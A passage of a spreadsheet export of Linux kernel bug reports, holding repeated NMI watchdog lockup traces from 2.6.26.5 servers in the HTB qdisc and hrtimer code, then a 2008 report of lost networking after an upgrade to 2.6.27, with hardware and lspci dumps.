0060:[&lt;c01faee7&gt;] EFLAGS: 00000096 CPU: 1 [176617.218140] EIP is at __rb_rotate_left+0x17/0x70 [176617.218140] EAX: f6c104a4 EBX: f6c104a4 ECX: f6c104a4 EDX: f6c104a4 [176617.218140] ESI: f6c104a4 EDI: c20190d4 EBP: c20190d4 ESP: f7c4dc9c [176617.218140] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [176617.218140] Process swapper (pid: 0, ti=f7c4c000 task=f7c314a0 task.ti=f7c4c000) [176617.218140] Stack: f6c104a4 f6c104a4 f6c104a4 c01fb018 f6c104a4 00000000 c20190cc c20190d4 [176617.218140] c013a8ff f6c104a4 c20190cc c200f0cc c044b0a0 c013adea 00000000 f7c4dcfc [176617.218140] 06da7c00 0000a0a1 00000001 00000286 f6c10000 ffffffff 00000000 00000000 [176617.218140] Call Trace: [176617.218140] [&lt;c01fb018&gt;] rb_insert_color+0x68/0xc0 [176617.218140] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [176617.218140] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [176617.218140] [&lt;c02d527e&gt;] qdisc_watchdog_schedule+0x1e/0x30 [176617.218140] [&lt;c02daa26&gt;] htb_dequeue+0x6a6/0x810 [176617.218140] [&lt;c02d40fc&gt;] __qdisc_run+0x19c/0x1d0 [176617.218140] [&lt;c02dae40&gt;] htb_enqueue+0x0/0x1e0 [176617.218140] [&lt;c02c86b7&gt;] dev_queue_xmit+0x267/0x380 [176617.218140] [&lt;c02e9cc0&gt;] ip_forward_finish+0x0/0x40 [176617.218140] [&lt;c02ec86f&gt;] ip_finish_output+0x11f/0x280 [176617.218140] [&lt;c02e9f8f&gt;] ip_forward+0x28f/0x2d0 [176617.218140] [&lt;c02e9ce5&gt;] ip_forward_finish+0x25/0x40 [176617.218140] [&lt;c02e8822&gt;] ip_rcv_finish+0x122/0x360 [176617.218140] [&lt;c016007b&gt;] split_vma+0xb/0x130 [176617.218140] [&lt;c016d7e9&gt;] add_partial+0x19/0x60 [176617.218140] [&lt;c016e8d9&gt;] __slab_free+0x169/0x290 [176617.218140] [&lt;c02e8ca0&gt;] ip_rcv+0x0/0x290 [176617.218140] [&lt;c02c54fb&gt;] netif_receive_skb+0x26b/0x470 [176617.218140] [&lt;c02c17e2&gt;] __netdev_alloc_skb+0x22/0x50 [176617.218140] [&lt;f886774d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [176617.218140] [&lt;f886a9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [176617.218140] [&lt;f8866f59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [176617.218140] [&lt;c02c790b&gt;] net_rx_action+0xfb/0x200 [176617.218140] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [176617.218140] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [176617.218140] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [176617.218140] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [176617.218140] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [176617.218140] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [176617.218140] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [176617.218140] ======================= [176617.218140] Code: 24 14 83 c4 18 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 ec 0c 89 1c 24 89 c3 89 7c 24 08 89 d7 89 74 24 04 8b 50 04 8b 30 &lt;8b&gt; 4a 08 83 e6 fc 85 c9 89 48 04 74 09 8b 01 83 e0 03 09 d8 89 [121302.565021] BUG: NMI Watchdog detected LOCKUP on CPU1, ip c01faf10, registers: [121302.565021] Modules linked in: netconsole e1000e i2c_i801 e1000 i2c_core [121302.565021] [121302.565021] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [121302.565021] EIP: 0060:[&lt;c01faf10&gt;] EFLAGS: 00000046 CPU: 1 [121302.565021] EIP is at __rb_rotate_left+0x40/0x70 [121302.565021] EAX: f7d5c4a4 EBX: f7d5c4a4 ECX: 00000000 EDX: f7d5c4a4 [121302.565021] ESI: f7d5c4a4 EDI: c20190d4 EBP: c20190d4 ESP: f7c4dc9c [121302.565021] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [121302.565021] Process swapper (pid: 0, ti=f7c4c000 task=f7c314a0 task.ti=f7c4c000) [121302.565021] Stack: f7d5c4a4 f7d5c4a4 f7d5c4a4 c01fb018 f7d5c4a4 00000000 c20190cc c20190d4 [121302.565021] c013a8ff f7d5c4a4 c20190cc c20230cc c044b0a0 c013adea 00000000 f7c4dcfc [121302.565021] 1467b400 00006e52 00000001 00000286 f7d5c000 ffffffff 00000000 00000000 [121302.565021] Call Trace: [121302.565021] [&lt;c01fb018&gt;] rb_insert_color+0x68/0xc0 [121302.565021] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [121302.565021] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [121302.565021] [&lt;c02d527e&gt;] qdisc_watchdog_schedule+0x1e/0x30 [121302.565021] [&lt;c02daa26&gt;] htb_dequeue+0x6a6/0x810 [121302.565021] [&lt;c02d40fc&gt;] __qdisc_run+0x19c/0x1d0 [121302.565021] [&lt;c02dae40&gt;] htb_enqueue+0x0/0x1e0 [121302.565021] [&lt;c02c86b7&gt;] dev_queue_xmit+0x267/0x380 [121302.565021] [&lt;c02e9cc0&gt;] ip_forward_finish+0x0/0x40 [121302.565021] [&lt;c02ec86f&gt;] ip_finish_output+0x11f/0x280 [121302.565021] [&lt;c02e9f8f&gt;] ip_forward+0x28f/0x2d0 [121302.565021] [&lt;c02e9ce5&gt;] ip_forward_finish+0x25/0x40 [121302.565021] [&lt;c02e8822&gt;] ip_rcv_finish+0x122/0x360 [121302.565021] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [121302.565021] [&lt;c02e8ca0&gt;] ip_rcv+0x0/0x290 [121302.565021] [&lt;c02c54fb&gt;] netif_receive_skb+0x26b/0x470 [121302.565021] [&lt;f886774d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [121302.565021] [&lt;f886a9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [121302.565021] [&lt;f8866f59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [121302.565021] [&lt;c02c790b&gt;] net_rx_action+0xfb/0x200 [121302.565021] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [121302.565021] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [121302.565021] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [121302.565021] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [121302.565021] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [121302.565021] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [121302.565021] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [121302.565021] ======================= [121302.565021] Code: 8b 30 8b 4a 08 83 e6 fc 85 c9 89 48 04 74 09 8b 01 83 e0 03 09 d8 89 01 8b 02 89 5a 08 83 e0 03 09 f0 85 f6 89 02 74 0a 3b 5e 08 &lt;74&gt; 1f 89 56 04 eb 02 89 17 8b 03 8b 74 24 04 8b 7c 24 08 83 e0 [96112.953448] BUG: NMI Watchdog detected LOCKUP on CPU1, ip c01faf93, registers: [96112.953448] Modules linked in: netconsole e1000e i2c_i801 e1000 i2c_core [96112.953448] [96112.953448] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [96112.953448] EIP: 0060:[&lt;c01faf93&gt;] EFLAGS: 00000046 CPU: 1 [96112.953448] EIP is at __rb_rotate_right+0x53/0x70 [96112.953448] EAX: f3287ca4 EBX: f3287ca4 ECX: 00000000 EDX: f3287ca4 [96112.953448] ESI: f3287ca4 EDI: f3287ca4 EBP: c20190d4 ESP: f7c4dc9c [96112.953448] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [96112.953448] Process swapper (pid: 0, ti=f7c4c000 task=f7c314a0 task.ti=f7c4c000) [96112.953448] Stack: f3287ca4 f3287ca4 f3287ca4 c01fb041 f3287ca4 00000000 c20190cc c20190d4 [96112.953448] c013a8ff f3287ca4 c20190cc c200f0cc c044b0a0 c013adea 00000000 f7c4dcfc [96112.953448] 2ac32800 00005769 00000001 00000286 f3287800 ffffffff 00000000 00000000 [96112.953448] Call Trace: [96112.953448] [&lt;c01fb041&gt;] rb_insert_color+0x91/0xc0 [96112.953448] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [96112.953448] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [96112.953448] [&lt;c02d527e&gt;] qdisc_watchdog_schedule+0x1e/0x30 [96112.953448] [&lt;c02daa26&gt;] htb_dequeue+0x6a6/0x810 [96112.953448] [&lt;c02d40fc&gt;] __qdisc_run+0x19c/0x1d0 [96112.953448] [&lt;c02dae40&gt;] htb_enqueue+0x0/0x1e0 [96112.953448] [&lt;c02c86b7&gt;] dev_queue_xmit+0x267/0x380 [96112.953448] [&lt;c02e9cc0&gt;] ip_forward_finish+0x0/0x40 [96112.953448] [&lt;c02ec86f&gt;] ip_finish_output+0x11f/0x280 [96112.953448] [&lt;c02e9f8f&gt;] ip_forward+0x28f/0x2d0 [96112.953448] [&lt;c02e9ce5&gt;] ip_forward_finish+0x25/0x40 [96112.953448] [&lt;c02e8822&gt;] ip_rcv_finish+0x122/0x360 [96112.953448] [&lt;c016d7e9&gt;] add_partial+0x19/0x60 [96112.953448] [&lt;c016d7e9&gt;] add_partial+0x19/0x60 [96112.953448] [&lt;c016e8d9&gt;] __slab_free+0x169/0x290 [96112.953448] [&lt;c011c700&gt;] find_busiest_group+0x180/0x740 [96112.953448] [&lt;c02e8ca0&gt;] ip_rcv+0x0/0x290 [96112.953448] [&lt;c02c54fb&gt;] netif_receive_skb+0x26b/0x470 [96112.953448] [&lt;f886774d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [96112.953448] [&lt;f886a9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [96112.953448] [&lt;f8866f59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [96112.953448] [&lt;c02c790b&gt;] net_rx_action+0xfb/0x200 [96112.953448] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [96112.953448] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [96112.953448] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [96112.953448] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [96112.953448] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [96112.953448] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [96112.953448] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [96112.953448] ======================= [96112.953448] Code: 03 09 d8 89 01 8b 02 89 5a 04 83 e0 03 09 f0 85 f6 89 02 74 0a 3b 5e 04 74 1f 89 56 08 eb 02 89 17 8b 03 8b 74 24 04 8b 7c 24 08 &lt;83&gt; e0 03 09 d0 89 03 8b 1c 24 83 c4 0c c3 89 56 04 eb e3 8d 76 Server 3: [ 8518.194288] BUG: NMI Watchdog detected LOCKUP on CPU3, ip c01faf57, registers: [ 8518.194288] Modules linked in: netconsole i2c_i801 e1000e i2c_core e1000 [ 8518.194288] [ 8518.194288] Pid: 0, comm: swapper Not tainted (2.6.26.5-fw #1) [ 8518.194288] EIP: 0060:[&lt;c01faf57&gt;] EFLAGS: 00000092 CPU: 3 [ 8518.194288] EIP is at __rb_rotate_right+0x17/0x70 [ 8518.194288] EAX: f52b14a4 EBX: f52b14a4 ECX: f52b14a4 EDX: f52b14a4 [ 8518.194288] ESI: f52b14a4 EDI: c202d0d4 EBP: c202d0d4 ESP: f7c5fc68 [ 8518.194288] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 8518.194288] Process swapper (pid: 0, ti=f7c5e000 task=f7c32940 task.ti=f7c5e000) [ 8518.194288] Stack: f52b14a4 f52b14a4 f52b14a4 c01fb041 f52b14a4 00000000 c202d0cc c202d0d4 [ 8518.194288] c013a8ff f52b14a4 c202d0cc c200f0cc c044b0a0 c013adea 00000000 f7c5fcc8 [ 8518.194288] 4bca9000 000007bf 00000001 00000286 f52b1000 ffffffff 00000000 00000000 [ 8518.194288] Call Trace: [ 8518.194288] [&lt;c01fb041&gt;] rb_insert_color+0x91/0xc0 [ 8518.194288] [&lt;c013a8ff&gt;] enqueue_hrtimer+0x5f/0x80 [ 8518.194288] [&lt;c013adea&gt;] hrtimer_start+0xaa/0x130 [ 8518.194288] [&lt;c02d585e&gt;] qdisc_watchdog_schedule+0x1e/0x30 [ 8518.194288] [&lt;c02db006&gt;] htb_dequeue+0x6a6/0x810 [ 8518.194288] [&lt;c02d46dc&gt;] __qdisc_run+0x19c/0x1d0 [ 8518.194288] [&lt;c02db420&gt;] htb_enqueue+0x0/0x1e0 [ 8518.194288] [&lt;c02c8c97&gt;] dev_queue_xmit+0x267/0x380 [ 8518.194288] [&lt;c02d3c9b&gt;] eth_header+0x2b/0xc0 [ 8518.194288] [&lt;c02ce0ab&gt;] neigh_resolve_output+0xdb/0x280 [ 8518.194288] [&lt;c02ea2a0&gt;] ip_forward_finish+0x0/0x40 [ 8518.194288] [&lt;c02ece4f&gt;] ip_finish_output+0x11f/0x280 [ 8518.194288] [&lt;c02ea56f&gt;] ip_forward+0x28f/0x2d0 [ 8518.194288] [&lt;c02ea2c5&gt;] ip_forward_finish+0x25/0x40 [ 8518.194288] [&lt;c02e8e02&gt;] ip_rcv_finish+0x122/0x360 [ 8518.194288] [&lt;c02c0d57&gt;] __alloc_skb+0x57/0x120 [ 8518.194288] [&lt;c0109c6a&gt;] nommu_map_single+0x2a/0x60 [ 8518.194288] [&lt;c02e9280&gt;] ip_rcv+0x0/0x290 [ 8518.194288] [&lt;c02c5adb&gt;] netif_receive_skb+0x26b/0x470 [ 8518.194288] [&lt;f886c74d&gt;] e1000_receive_skb+0x4d/0x1b0 [e1000e] [ 8518.194288] [&lt;f886f9bc&gt;] e1000_clean_rx_irq+0x23c/0x300 [e1000e] [ 8518.194288] [&lt;f886bf59&gt;] e1000_clean+0x49/0x1f0 [e1000e] [ 8518.194288] [&lt;c02c7eeb&gt;] net_rx_action+0xfb/0x200 [ 8518.194288] [&lt;c012a062&gt;] __do_softirq+0x82/0x100 [ 8518.194288] [&lt;c012a117&gt;] do_softirq+0x37/0x40 [ 8518.194288] [&lt;c0107120&gt;] do_IRQ+0x40/0x80 [ 8518.194288] [&lt;c01055a3&gt;] common_interrupt+0x23/0x28 [ 8518.194288] [&lt;c010a5e2&gt;] mwait_idle+0x32/0x40 [ 8518.194288] [&lt;c010a5b0&gt;] mwait_idle+0x0/0x40 [ 8518.194288] [&lt;c01036e8&gt;] cpu_idle+0x48/0xc0 [ 8518.194288] ======================= [ 8518.194288] Code: 24 83 c4 0c c3 89 56 08 eb e3 8d 76 00 8d bc 27 00 00 00 00 83 ec 0c 89 1c 24 89 c3 89 7c 24 08 89 d7 89 74 24 04 8b 50 08 8b 30 &lt;8b&gt; 4a 04 83 e6 fc 85 c9 89 48 08 74 09 8b 01 83 e0 03 09 d8 89</t>
  </si>
  <si>
    <t>after upgrade to 2.6.27 i cannot navigate</t>
  </si>
  <si>
    <t>2008-10-08 08:08 UTC</t>
  </si>
  <si>
    <t>Aldo Maggi</t>
  </si>
  <si>
    <t>2008-11-08 22:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27-rc8 Distribution: debian, ubuntu Hardware Environment: less /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 6 model name : AMD Athlon(tm) XP 1700+ stepping : 2 cpu MHz : 1460.519 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mp mmxext 3dnowext 3dnow up bogomips : 2922.96 clflush size : 32 power management: ts /ver_linux Linux paperino 2.6.27-rc8.200810071002 #1 SMP Tue Oct 7 10:17:39 CEST 2008 i686 GNU/Linux Gnu C 4.3.2 Gnu make 3.81 binutils 2.18.0.20080103 util-linux 2.13.1.1 mount 2.13.1.1 module-init-tools 3.4 e2fsprogs 1.41.0 reiserfsprogs 3.6.19 Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Net-tools 1.60 Kbd [opzione...] Console-tools 0.2.3 Sh-utils 6.10 udev 125 wireless-tools 29 Modules Loaded rfcomm l2cap bluetooth ppdev lp video output ac battery cpufreq_powersave cpufreq_stats cpufreq_userspa ce cpufreq_ondemand cpufreq_conservative freq_table ipv6 ext3 jbd mbcache fuse loop snd_ens1371 gameport snd_seq_dummy snd_seq _oss snd_seq_midi snd_seq_midi_event snd_seq snd_rawmidi snd_seq_device arc4 ecb crypto_blkcipher snd_ac97_codec ac97_bus snd_ pcm_oss snd_mixer_oss snd_pcm psmouse serio_raw snd_timer snd pcspkr rtl8180 mac80211 soundcore snd_page_alloc eeprom_93cx6 cf g80211 parport_pc parport button i2c_sis96x i2c_sis630 shpchp i2c_core pci_hotplug sis_agp agpgart evdev reiserfs sg sr_mod cd rom sd_mod ide_pci_generic sis5513 ide_core pata_sis floppy ata_generic libata ehci_hcd uhci_hcd sis900 3c59x mii scsi_mod doc k ohci_hcd usbcore thermal processor fan thermal_sys cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:02.5 0170-0177 : pata_sis 01f0-01f7 : 0000:00:02.5 01f0-01f7 : pata_sis 02f8-02ff : serial 0376-0376 : 0000:00:02.5 0376-0376 : pata_sis 0378-037a : parport0 03c0-03df : vga+ 03f2-03f5 : floppy 03f6-03f6 : 0000:00:02.5 03f6-03f6 : pata_sis 03f7-03f7 : floppy DIR 03f8-03ff : serial 0800-0803 : ACPI PM1a_EVT_BLK 0804-0805 : ACPI PM1a_CNT_BLK 0808-080b : ACPI PM_TMR 0820-0823 : ACPI GPE0_BLK 0830-0833 : ACPI GPE1_BLK 0c00-0c1f : 0000:00:02.1 0c00-0c1f : sis96x_smbus 0cf8-0cff : PCI conf1 c800-c81f : 0000:00:13.0 c800-c81f : uhci_hcd cc00-cc1f : 0000:00:13.1 cc00-cc1f : uhci_hcd d000-d03f : 0000:00:11.0 d000-d03f : Ensoniq AudioPCI d400-d47f : 0000:00:0d.0 d800-d8ff : 0000:00:0b.0 d800-d8ff : rtl8180 dc00-dcff : 0000:00:03.0 dc00-dcff : sis900 ff00-ff0f : 0000:00:02.5 ff00-ff0f : pata_sis cat /proc/iomem 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cf3ff : Video ROM 000cf800-000d77ff : Adapter ROM 000f0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-2ffeffff : System RAM 00100000-002cb2d7 : Kernel code 002cb2d8-00387307 : Kernel data 003d3000-00436b47 : Kernel bss 01604000-01604fff : Local APIC 2fff0000-2fff7fff : ACPI Tables 2fff8000-2fffffff : ACPI Non-volatile Storage bdc00000-cdcfffff : PCI Bus 0000:01 c0000000-c7ffffff : 0000:01:00.0 cde00000-cfefffff : PCI Bus 0000:01 ce000000-ceffffff : 0000:01:00.0 cfee0000-cfefffff : 0000:01:00.0 cffa0000-cffbffff : 0000:00:0d.0 cffc0000-cffdffff : 0000:00:03.0 cfffca00-cfffcaff : 0000:00:13.2 cfffca00-cfffcaff : ehci_hcd cfffcb80-cfffcbff : 0000:00:0d.0 cfffcc00-cfffcfff : 0000:00:0b.0 cfffcc00-cfffcfff : rtl8180 cfffd000-cfffdfff : 0000:00:03.0 cfffd000-cfffdfff : sis900 cfffe000-cfffefff : 0000:00:02.2 cfffe000-cfffefff : ohci_hcd cffff000-cfffffff : 0000:00:02.3 cffff000-cfffffff : ohci_hcd d0000000-d3ffffff : 0000:00:00.0 fec00000-fec00fff : reserved fee00000-fee00fff : reserved ffee0000-ffefffff : reserved fffc0000-ffffffff : reserved lspci -vvv 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 735 Host (rev 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 32 Region 0: Memory at d0000000 (32-bit, non-prefetchable) [size=64M] Capabilities: [c0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Kernel driver in use: agpgart-sis Kernel modules: sis-agp 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-/ver_linux Linux paperino 2.6.27-rc8.200810071002 #1 SMP Tue Oct 7 10:17:39 CEST 2008 i686 GNU/Linux Gnu C 4.3.2 Gnu make 3.81 binutils 2.18.0.20080103 util-linux 2.13.1.1 mount 2.13.1.1 module-init-tools 3.4 e2fsprogs 1.41.0 reiserfsprogs 3.6.19 Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Net-tools 1.60 Kbd [opzione...] Console-tools 0.2.3 Sh-utils 6.10 udev 125 wireless-tools 29 Modules Loaded rfcomm l2cap bluetooth ppdev lp video output ac battery cpufreq_powersave cpufreq_stats cpufreq_userspa ce cpufreq_ondemand cpufreq_conservative freq_table ipv6 ext3 jbd mbcache fuse loop snd_ens1371 gameport snd_seq_dummy snd_seq _oss snd_seq_midi snd_seq_midi_event snd_seq snd_rawmidi snd_seq_device arc4 ecb crypto_blkcipher snd_ac97_codec ac97_bus snd_ pcm_oss snd_mixer_oss snd_pcm psmouse serio_raw snd_timer snd pcspkr rtl8180 mac80211 soundcore snd_page_alloc eeprom_93cx6 cf g80211 parport_pc parport button i2c_sis96x i2c_sis630 shpchp i2c_core pci_hotplug sis_agp agpgart evdev reiserfs sg sr_mod cd rom sd_mod ide_pci_generic sis5513 ide_core pata_sis floppy ata_generic libata ehci_hcd uhci_hcd sis900 3c59x mii scsi_mod doc k ohci_hcd usbcore thermal processor fan thermal_sys Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 0000f000-00000fff Memory behind bridge: cde00000-cfefffff Prefetchable memory behind bridge: bdc00000-cdcfffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Kernel modules: shpchp 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Kernel modules: i2c-sis630 00:02.1 SMBus: Silicon Integrated Systems [SiS] SiS961/2 SMBus Controller Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 0 Region 4: I/O ports at 0c00 [size=32] Kernel driver in use: sis96x_smbus Kernel modules: i2c-sis96x 00:02.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.1 Controller (rev 07) (prog-if 10) Subsystem: Silicon Integrated Systems [SiS] USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (20000ns max), Cache Line Size: 32 bytes Interrupt: pin D routed to IRQ 5 Region 0: Memory at cfffe000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd Kernel modules: ohci-hcd 00:02.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.1 Controller (rev 07) (prog-if 10) Subsystem: Silicon Integrated Systems [SiS] USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (20000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at cffff000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd Kernel modules: ohci-hcd 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) (prog-if 80 [Master]) Subsystem: Silicon Integrated Systems [SiS] 5513 [IDE] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 128 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size=1] Region 4: I/O ports at ff00 [size=16] Kernel driver in use: pata_sis Kernel modules: pata_sis, sis5513 00:03.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 90) Subsystem: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (13000ns min, 2750ns max) Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at dc00 [size=256] Region 1: Memory at cfffd000 (32-bit, non-prefetchable) [size=4K] Expansion ROM at cffc0000 [disabled] [size=128K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: sis900 Kernel modules: sis900 00:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8185 IEEE 802.11a/b/g Wireless LAN Controller (rev 20) Subsystem: Realtek Semiconductor Co., Ltd. RTL-8185 IEEE 802.11a/b/g Wireless LAN Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (8000ns min, 16000ns max), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at d800 [size=256] Region 1: Memory at cfffcc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: rtl8180 Kernel modules: rtl8180 00:0d.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) Subsystem: 3Com Corporation 3c905B 100BaseTX [Cyclone] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (2500ns min, 2500ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at d400 [size=128] Region 1: Memory at cfffcb80 (32-bit, non-prefetchable) [size=128] Expansion ROM at cffa0000 [disabled] [size=128K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA 